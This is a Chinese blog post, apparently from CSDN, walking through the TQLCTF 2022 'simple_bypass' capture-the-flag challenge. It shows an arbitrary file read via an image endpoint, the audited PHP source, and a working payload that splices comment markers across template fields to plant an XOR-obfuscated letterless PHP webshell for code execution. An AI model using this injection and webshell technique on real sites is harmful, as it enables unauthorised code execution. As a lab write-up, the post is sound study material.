simple_bypass

最新推荐文章于 2024-05-07 20:51:44 发布
最新推荐文章于 2024-05-07 20:51:44 发布
阅读量835 收藏
点赞数
分类专栏: 打靶笔记 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60716947/article/details/127562960
版权

开靶机,发现一个登录与注册的页面,尝试sql注入,无果,随便注册一个登录上去

东西很多,到处点一点,发现在杰哥那张图片的元素中有base64编码

 

拿到base64转图片去看一下,BASE64转图片 - 站长工具 - 极速数据 (jisuapi.com)

发现有图片出来,说明应该可以通过这个来任意读取文件内容,

 

再往上能看到一个src,提示了我们获取文件的方法,

 

读到index.php内容的base64编码,解密Base64 在线编码解码 | Base64 加密解密 - Base64.us 

<?php

error_reporting(0);
if(isset($_POST['user']) && isset($_POST['pass'])){
	$hash_user = md5($_POST['user']);
	$hash_pass = 'zsf'.md5($_POST['pass']);
	if(isset($_POST['punctuation'])){
		//filter
		if (strlen($_POST['user']) > 6){
			echo("<script>alert('Username is too long!');</script>");
		}
		elseif(strlen($_POST['website']) > 25){
			echo("<script>alert('Website is too long!');</script>");
		}
		elseif(strlen($_POST['punctuation']) > 1000){
			echo("<script>alert('Punctuation is too long!');</script>");
		}
		else{
			if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
				if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
					$_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
					$template = file_get_contents('./template.html');
					$content = str_replace("__USER__", $_POST['user'], $template);
					$content = str_replace("__PASS__", $hash_pass, $content);
					$content = str_replace("__WEBSITE__", $_POST['website'], $content);
					$content = str_replace("__PUNC__", $_POST['punctuation'], $content);
					file_put_contents('sandbox/'.$hash_user.'.php', $content);
					echo("<script>alert('Successed!');</script>");
				}
				else{
					echo("<script>alert('Invalid chars in website!');</script>");
				}
			}
			else{
				echo("<script>alert('Invalid chars in username!');</script>");
			}
		}
	}
	else{
		setcookie("user", $_POST['user'], time()+3600);
		setcookie("pass", $hash_pass, time()+3600);
		Header("Location:sandbox/$hash_user.php");
	}
}
?>

审计代码(还好简单,不然我这个菜鸡就寄了),几个post传参,并对长度进行了限制,然后正则匹配过滤。

看到这个

$_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);

 很像无字母数字rce,先看看后面的,获取了template.html的页面内容,并进行了一些替换,我们再去看看template.html的代码

上面的头部不用管,直接看body

<body>
<div id="lr_bar">
  <ul id="default_app">
    <li id="app0"><img src="../img/icon1.png" title="bilibili" path="https://www.bilibili.com/"/></li>
    <!-- <li  id="app2"><img src="../img/icon0.png" title="Stack Overflow" path="https://stackoverflow.com/"/></li> -->
    <li id="app3"><img src="../img/icon2.png" title="世纪佳缘" path="https://www.jiayuan.com/"/></li>
    <!-- <li id="app1"><img src="../img/icon11.png" title="steam" path="https://store.steampowered.com/"/></li> -->
  </ul>
  <div id="default_tools"> <span id="showZm_btn" title="显示桌面"></span><span id="shizhong_btn" title="时钟"></span><span id="weather_btn" title="天气"></span> <span id="them_btn" title="主题"></span></div>
  <div id="start_block"> <a title="开始" id="start_btn"></a>
    <div id="start_item">
      <ul class="item admin">
        <li><span class="adminImg"></span>
		<?php
			error_reporting(0);
			$user = ((string)__USER__);
			$pass = ((string)__PASS__);
			
			if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){
				echo($_COOKIE['user']);
			}
			else{
				die("<script>alert('Permission denied!');</script>");
			}
		?>
		</li>
      </ul>
      <ul class="item">
        <li><span class="sitting_btn"></span>系统设置</li>
        <li><span class="help_btn"></span>使用指南 <b></b></li>
        <li><span class="about_btn"></span>关于我们</li>
        <li><span class="logout_btn"></span>退出系统</li>
      </ul>
    </div>
  </div>
</div>
<a href="#" class="powered_by">__PUNC__</a>
<ul id="deskIcon">
  <li class="desktop_icon" id="win5" path="https://image.baidu.com/"> <span class="icon"><img src="../img/icon4.png"/></span>
    <div class="text">图片
      <div class="right_cron"></div>
    </div>
  </li>
  <li class="desktop_icon" id="win6" path="http://www.4399.com/"> <span class="icon"><img src="../img/icon5.png"/></span>
    <div class="text">游戏
      <div class="right_cron"></div>
    </div>
  </li>
  <li class="desktop_icon" id="win10" path="../get_pic.php?image=img/haokangde.png"> <span class="icon"><img src="../img/icon4.png"/></span>
    <div class="text"><b>好康的</b>
      <div class="right_cron"></div>
    </div>
  </li>
  <li class="desktop_icon" id="win16" path="__WEBSITE__"> <span class="icon"><img src="../img/icon10.png"/></span>
    <div class="text"><b>你的网站</b>
      <div class="right_cron"></div>
    </div>
  </li>

</ul>

<div id="taskBar">
  <div id="leftBtn"><a href="#" class="upBtn"></a></div>
  <div id="rightBtn"><a href="#" class="downBtn"></a> </div>
  <div id="task_lb_wrap">
    <div id="task_lb"></div>
  </div>
</div>

</div>
</body>

可以看到几个被插入的数据位置

·user:

主要是这里,但是index.php对他的长度进行了限制,所以不能在这里构造

 ·passwd

在index.php中被md5编码了,也不行。

·website

插入到了标签里面,不好操作

·punctuation 

可以看到被a标签包裹着,而且限制长度最松,就选他了

那么要如何利用呢,可以在用户名那里写半个多行注释符,再在后面的__PUNC__或者__WEBSITE__使用半个注释符进行闭合,然后构造恶意代码,再在最后使用半个多行注释符把后面注释掉就可以了

 用异或或自增都可以

user=1)/*&passwd=1&website=1&punctuation=*/;$_='($((%-'^'[][\@@';$__='#:%('^'|}`|';$___=$$__;echo $___;$_($___['!']);/*

我们看一下这样创建一个账号,插入到template是个什么样子

<?php
			error_reporting(0);
			$user = (1)/*);
			$pass = ((string)__PASS__);
			
			if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){
				echo($_COOKIE['user']);
			}
			else{
				die("<script>alert('Permission denied!');</script>");
			}
		?>
		</li>
      </ul>
      <ul class="item">
        <li><span class="sitting_btn"></span>系统设置</li>
        <li><span class="help_btn"></span>使用指南 <b></b></li>
        <li><span class="about_btn"></span>关于我们</li>
        <li><span class="logout_btn"></span>退出系统</li>
      </ul>
    </div>
  </div>
</div>
<a href="#" class="powered_by">*/;$_='($((%-'^'[][\@@';$__='#:%('^'|}`|';$___=$$__;echo $___;$_($___['!']);/*</a>
<ul id="deskIcon">
  <li class="desktop_icon" id="win5" path="https://image.baidu.com/"> <span class="icon"><img src="../img/icon4.png"/></span>
    <div class="text">图片
      <div class="right_cron"></div>

很明显看出被构造成了一个php脚本,其他无用代码都被注释了

 

登录 ,跟之前页面不一样没关系

 直接get传参拿到flag

清丶酒孤欢ゞ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
TQLCTF2022真题
02-22
TQLCTF2022真题
[TQLCTF 2022]simple_bypass
m0_70819573的博客
03-24 172
可以发现file_put_contents危险函数,注册的信息会写入php文件,所以考虑可控的四个参数,user,password,website,punctuation,其中punctuation过滤了字母数字,但长度限制较为松,从而可以实现任意文件读取,可以获得index.php,template.html,get_pic.php的源码。查看好康的,审查元素,发现是base64加密 ,且使用了get_pic.php方法。可以用自增来getshell.
NSSCTF web题记录
m0_64815693的博客
11-08 9120
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
2022 TQLCTF nemu
weixin_46483787的博客
03-02 1320
nemu是一个南京大学的调试器项目,想了解更多可以去github上看看: https://github.com/NJU-ProjectN/nemu 我们首先把程序运行起来看看: 通过help可以看到程序实际上是实现了一个简单的debugger功能,里面内置了一段简短的汇编代码,那么接下来我们将目光放到help中出现的这几个函数上即可 这里直接给出结论,x指令在读的时候没有检查地址,从而导致了越界读,set存在一个越界写,而本题got表可改,且没开PIE 先来分析一下程序运行过程: 首先是读入命令,根据读入
[TQLCTF2022] Simple PHP WP
A10ng_的博客
02-21 681
这个题很有意思,写shell的姿势比较好玩,我在之前搞渗透的时候同样遇到类似手法, 所以就记录一下。 打开题目是一个登录口,个人习惯,先测一下注入,发现是不存在的,然后注册一个号上去康康,这一康不得了,发现了有个功能点有任意文件读取,他是去加载本地文件的一个功能。并且文件的路径和文件名可控,在测试了/etc/passwd,成功读取了。 然后在fuzz了一下flag文件名没有结果后,继续尝试下一步,把所有的源码读出来,我首先读了这个功能点的源码。发现是用的file_get_contents函数,所以并不存在
Choosing and Using Bypass Capacitors
01-03
back to this seemingly simple component. After discussing the motivation for using bypass caps, we form a vocabulary around the basics; equivalent circuit, dielectrics and types of available ...
simple-dns:一个非常简单且愚蠢的DNS服务器来绕过DNS污染
05-05
a very simple and stupid DNS server to bypass the DNS pollution. 很傻的DNS server,破DNS污染。 how it works: your remote server listen on a port other than 53, (as you can see in config.json.remote, ...
gf.zip_PV shading_open_pv_pv series_shading module PV
09-20
This simple case is used to illustrate the effect of shading a single module in a PV array of 11 modules connected in series. -PVarray1 represnt 1 PV module in the array -PVarray2 represnt 10 ...
unicorn-master_ddos_ThroughtheWindow_
09-29
Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.Usage is simple just run Magic Unicorn (ensure ...
xdma_driver_win_src_2018_2.zip (xilinx pcie dma driver)
09-29
| | as control, user, bypass, h2c_0, c2h_0 etc. | |__ xdma_test/ - Basic test application which performs H2C/C2H transfers on | all present channels. |__ inc/ - Contains public API header file for ...
TQLCTF2022 WriteUP(自己做+收集整理+持续更新)
Laffrey的专栏
02-22 1376
[Misc]1.签到 关注微信公众号后,获得1个链接,在源码中找到flag。 [Misc]2. Wizard 访问链接,打开web页面显示的内容如下: SHA256('TQLCTF' + ?) starts with 58011 Please input the string: 于是,猜测这题需要通过命令行(CLI)界面进行交互。 题目是对字符串 'TQLCTF' + ? 进行SHA256哈希计算,得到的哈希值以 58011 开头。 显然,我们需要根据server端发来的回显信息,提取到哈希值(58011
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
NLOS的博客
05-05 432
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师会仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他会问自己这样的问题:“如果我是敌人,我会从哪里发起进攻?我的目标是什么?我会利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
内容安全(IPS入侵检测)
m0_66993332的博客
05-07 457
入侵检测系统IPS
「 网络安全常用术语解读 」通用漏洞报告框架CVRF详解
网络安全
05-04 725
ICASI在推进多供应商协调漏洞披露方面处于领先地位,引入了通用漏洞报告框架(Common Vulnerability Reporting Format,CVRF)标准,制定了统一安全事件响应计划(USIRP)的原则,帮助创建了多方漏洞协调和披露指南和实践,并建立了一个成功协调多供应商应对众多安全事件的行业领导者信托小组。为了继续取得这些成功,并确保全球社会更广泛的参与,ICASI(Industry Consortium for Advancement of Security on the Internet
JAVA语言开发的(智慧校园系统源码)智慧校园的痛点、智慧校园的安全应用、智慧校园解决方案
爱笑的源码博客
05-07 1111
智慧校园的解决方案 1、基础设施建设:无线网络全覆盖:确保校园内所有区域都有稳定的无线网络信号,满足师生在教学、学习、科研和生活中的网络需求。 2、物联网部署:在教室、实验室、图书馆、宿舍等场所部署物联网设备,实现设备间的互联互通和智能管理。
AI烟雾监测识别摄像机:智能化安全防范的新利器
bova2022的博客
05-07 361
AI烟雾监测识别摄像机的应用范围广泛,不仅可以安装在家庭、商业建筑、工厂等场所,还可以应用于地铁、火车站等公共场所,为人们的生命财产安全提供全方位的保障。应运而生,成为智能化安全防范的新利器。这种AI烟雾监测识别摄像机,融合了人工智能技术和摄像监控技术,能够实时监测环境中的烟雾情况,并在检测到异常时及时触发警报,以便采取及时有效的灭火措施,最大程度地减少火灾带来的损失。随着现代社会的不断发展,人们对于安全问题的关注日益增加,尤其是在日常生活和工作中,对火灾等意外事件的预防成为了一项重要任务。
Java 开发 框架安全:Spring 漏洞序列.(CVE-2022-22965)
最新发布
网络安全领域___专研者.
05-07 544
Spring 框架是一个用于构建企业级应用程序的开源框架。它提供了一种全面的编程和配置模型,可以简化应用程序的开发过程。Spring 框架的核心特性包括依赖注入(Dependency Injection)、面向切面编程(Aspect-Oriented Programming)、声明式事务管理(Declarative Transaction Management)等。依赖注入是 Spring 框架的核心概念之一,它通过将对象之间的依赖关系外部化,使得对象之间的协作更加灵活和可测试。
mtk_bypass中文版
05-14
mtk_bypass中文版是一款由国内开发者制作的MTK芯片解锁工具。这个工具能够在不需要输入账户密码的情况下解锁MTK芯片的手机或平板电脑。用户可以在手机出现账户锁或屏幕锁时使用该工具进行解锁,同时能够快速刷机、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值